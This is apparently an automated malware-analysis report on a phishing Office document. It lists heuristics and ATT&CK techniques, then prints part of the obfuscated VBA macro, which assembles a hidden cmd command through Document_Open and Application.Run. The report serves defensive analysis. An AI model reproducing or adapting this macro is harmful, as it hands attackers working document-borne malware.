Verdict: MALICIOUS
Risk Score: 162

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and utilizes a 'Shell()' call, indicating an attempt to execute arbitrary code. The VBA script is obfuscated but its presence and the 'Shell()' call strongly suggest it's designed to download and execute a secondary payload.
Heuristics (5):
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26848 bytes |

SHA-256: ab8235a274d3dd95ab7f0c2e22c51088d963890ecbdf15d69fe69acbe5a7af4b
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "vHqTdVZJbLoAjp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wApAlzP()
ismzlw = (rJwknV + vahzU) * (vSGEZ / 40132)
sVEhR = (rSmww + wlSzT) * (DbpcWB / 41882)
HhLtLc = (tqMHo + FAWfU) * (wOXCSG / 22268)
QzCLE = (jkaEnp + rbkLCl) * (oGrhh / 28421)
HVdpD = (FhRnDj + kaPRw) * (YKQAi / 89677)
End Function
Function mhZQRSjo()
IUZVdQ = (ijcchl + RzclG) * (PJDNL / 67000)
jWKNIt = (oHLrrn + UIzrVv) * (wJsvkO / 73844)
AmwWOd = (wIGmG + dVuuww) * (SsSXA / 71032)
SYiJZ = (KEuRM + uDiOJo) * (jWBpQ / 80280)
QiOTTj = (kVvjZ + YzmjHQ) * (FBNij / 82796)
End Function
Private Sub Document_open()
On Error Resume Next
pVsit = roQBOf / tvMAi * FnFrTt / mOMkq - (tEcaFa + hTOTNw * (WjLGun * nTkdZp / 81584 - dcfLc))
ZjMGVT = Eqvzb / iJOPw * iJZvSY / WtEGwX - (wkaOP + ojcpc * (zbjhiY * jPRzo / 88672 - qwKAkw))
QVHaC = mZmiU / fCCFq * pFksw / lpUpln - (WqGSq + UklBuz * (EYKKbW * HnhjXY / 51528 - Nrznwb))
JduUh = (83861 * KnSNV / 40642 * 7601) - 7584 + jKGLB / 27876 + RwScvq
zhihJ = iSANZE / mourwN * KbQZwV / RYrjZ - (DjUAff + EGVMr * (kjPOuK * srXREl / 77970 - NtIiAG))
UuMTM = (65083 * FDiQk / 59729 * 4675) - 19296 + YoFMIC / 92565 + qRrMNi
IwNvEJPP = Application.Run("JORbzhnA", "" + ujzziGwjk + ZEnLVizrqhklU + CVar("c") + sYcFfCiMowj + aRkPWDJlJw + mrCGztEznhv + uhlQOMi + ZsjtJYT + CfljRIA + PPaQwRAJS + fijfGZ + Dzorcr + rjiiSVfqEt + NUhnwEOHkE + libNraMTNmN + UwVrFRJGI + YXnnJW + rqbBHpPjOu + paYmNjcCbfYuj)
NwiZa = (90249 * MjMqi / 52775 * 99170) - 60082 + jfiri / 99597 + ubUirn
PPiUw = (50665 * iicCDt / 90614 * 48548) - 94457 + pGbXt / 79465 + JOptMR
dTARk = (51095 * PzwtKK / 56461 * 67460) - 13651 + hRFaB / 97383 + awKhk
End Sub
Function zijNcDIMuVl()
iKdznd = (86728 * JTLdZ / 63804 * 76193) - 10389 + aGWTbR / 23626 + HnNXDT
XXWuad = (5083 * GnNVo / 95882 * 10797) - 32475 + YPRLf / 94039 + RucWW
MzhNTD = (19334 * vlKls / 1846 * 82132) - 6985 + DCZiM / 6257 + RHjqfk
OiKEz = (14366 * Nmsisr / 36740 * 83835) - 76236 + DviwV / 51381 + raDdf
End Function
Attribute VB_Name = "rNhFrjWwKYp"
Function mrCGztEznhv()
On Error Resume Next
YTCBtk = 15499 * BmnCkq / 21478 / 6036
oUodBf = (RfzwiE - zVMOkW * 4781 - KlFfo) / 6828 + micXjq - 63964 - vSWacE
cLZFmjs = CStr(Chr(rarjqniORNl + DiqVnMG + 109 + oLnpMvCUD + wGHvRGX)) + "d /" + CStr(Chr(NmZSpoPXR + EQcljvBa + 99 + zJtcDzbu + pfwBClUzYjfC)) + " ^fo" + "r , /" + "F " + ";" + " " + CStr(Chr(BiiVPVFwoBQd + mrncNlUYSajvb + 34 + GjuXKaV + fibsqwkZ)) + " " + " to" + "ke"
iuCOi = (SBhhKD - VqWmt * 34110 - KUCSj) / 32599 + NvaCBw - 72784 - uBQIlK
JXmXz = (EpKqTI - rkiNz * 9635 - GiIHl) / 45171 + VWljLo - 34695 - vttzhr
LcdkCQ = (vlFQwi - flZji * 34856 - KIUvw) / 78215 + TAXOVm - 94139 - InuEoq
khVfsOqNRw = "n" + "s= " + " +4" + " " + " "
WOjOH = (zITSA - IoDct * 52523 - hCasRA) / 55814 + pddjQD - 93248 - kIZMb
BUwKz = (qcvOIY - vWOOi * 75116 - fqikQ) / 23790 + TUTOK - 15113 - YXVpdn
hUHia = (OtLhoR - LlLunj * 43970 - bzwQZ) / 42745 + sYBzJi - 16004 - cllkF
mdQKU = "deli" + CStr(Chr(NjsCpAOdQDl + DuiVWFVPQYhziJ + 109 + WqKqwoVOdEXw + PVKoYwI)) + "s" + "=l" + "i5N" + "Z" + CStr(Chr(UjOwILFLq + uNbiwOYUrRhYSM + 34 + mqlcZvbq + sNDYshKCKCtj)) + " ; " + "%^"
WqWNmJ = (pEcsGU - OBIQA * 74748 - oHvDXj) / 16404 + wRhTS - 55160 - CILjd
YTpCMqzR = "2" + " , " + "^" + "iN " + " ; " + ", " + "( , ' " + "; ^^A" + "SSo"
mrCGztEznhv = cLZFmjs + khVfsOqNRw + mdQKU + YTpCMqzR
lBtTWk = (oaVAhi - JPamnF * 20081 - nBjpw) / 98213 + RJUta - 20053 - dPlRV
zSvrc = (wIqYpW - Ornhld * 69518 - MfnIQ) / 16016 + LBVjhD - 80616 - kzWzIJ
End Function
Function uhlQOMi()
On Error Resume Next
Dkmmb = (jsszl - HiLqKw * 79622 - GpWYI) / 5430 + Odbzti - 70140 - fVzjz
pEEwdO = (JwMdu - ONOdYT * 35043 - RzsEW) / 58691 + VKNrMP - 358 - UMZVD
mFmCh = "^" + "^C ; ;" + "
```

... (truncated)